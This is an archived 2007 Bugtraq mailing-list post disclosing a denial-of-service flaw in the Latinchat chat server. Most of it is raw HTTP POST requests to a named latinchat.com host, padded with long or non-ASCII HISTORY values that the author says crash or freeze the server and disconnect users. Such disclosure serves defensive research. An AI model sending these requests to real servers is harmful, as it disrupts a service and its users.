bugtraq
[Top] [All Lists]

Re: Latinchat Denial Of Service

To: bugtraq@securityfocus.com
Subject: Re: Latinchat Denial Of Service
From: d4rksoft@hotmail.com
Date: 8 Apr 2007 13:08:27 -0000
Delivered-to: sp-com-lists@consult.net
Delivered-to: bugtraq-list@securepoint.com
Delivered-to: mailing list bugtraq@securityfocus.com
Delivered-to: moderator for bugtraq@securityfocus.com
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@securityfocus.com; run by ezmlm
Today this vulnerability keeps on existing in latinchat but with certain 
difference.Instead of request: 

POST /JAVA HTTP/1.0 
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) 
Referer: http://www.disp004-org.latinchat.com 
Content-length: 142 
UserName=mynick&SessionID=C17d808043&TEMPLATE=2&RoomID=R34_3-1&HISTORY=999999999999999999999999999999999999999999999999999999999999999999999
 

the user can send other request using ASCII  characters, for example : 

POST /JAVA HTTP/1.0 
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) 
Referer: http://www.disp004-org.latinchat.com 
Content-length: 142 
UserName=mynick&SessionID=C17d808043&TEMPLATE=2&RoomID=R34_3-1&HISTORY=ر«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±
 

by sending this request to the server, it will crash. 

Another request that freezes the server has following aspect: 

POST /IN HTTP/1.0 
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) 
Referer: http://www.disp004-org.latinchat.com 
Content-length: 142 

using this request  the attacker can boot  certain quantity of users at the 
same time and the server remains frozen until the attacker does not stop 
process of attack.And in this case it does not have a lot of importance what we 
are going to put in variable of history :
HISTORY=ر«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±
 

or 

HISTORY=999999999999999999999999999999999999999999999999999999999999999999999999999
 

the result will be the same 

Researcher: Vitto Makarsky 

<Prev in Thread] Current Thread [Next in Thread>
  • Re: Latinchat Denial Of Service, d4rksoft <=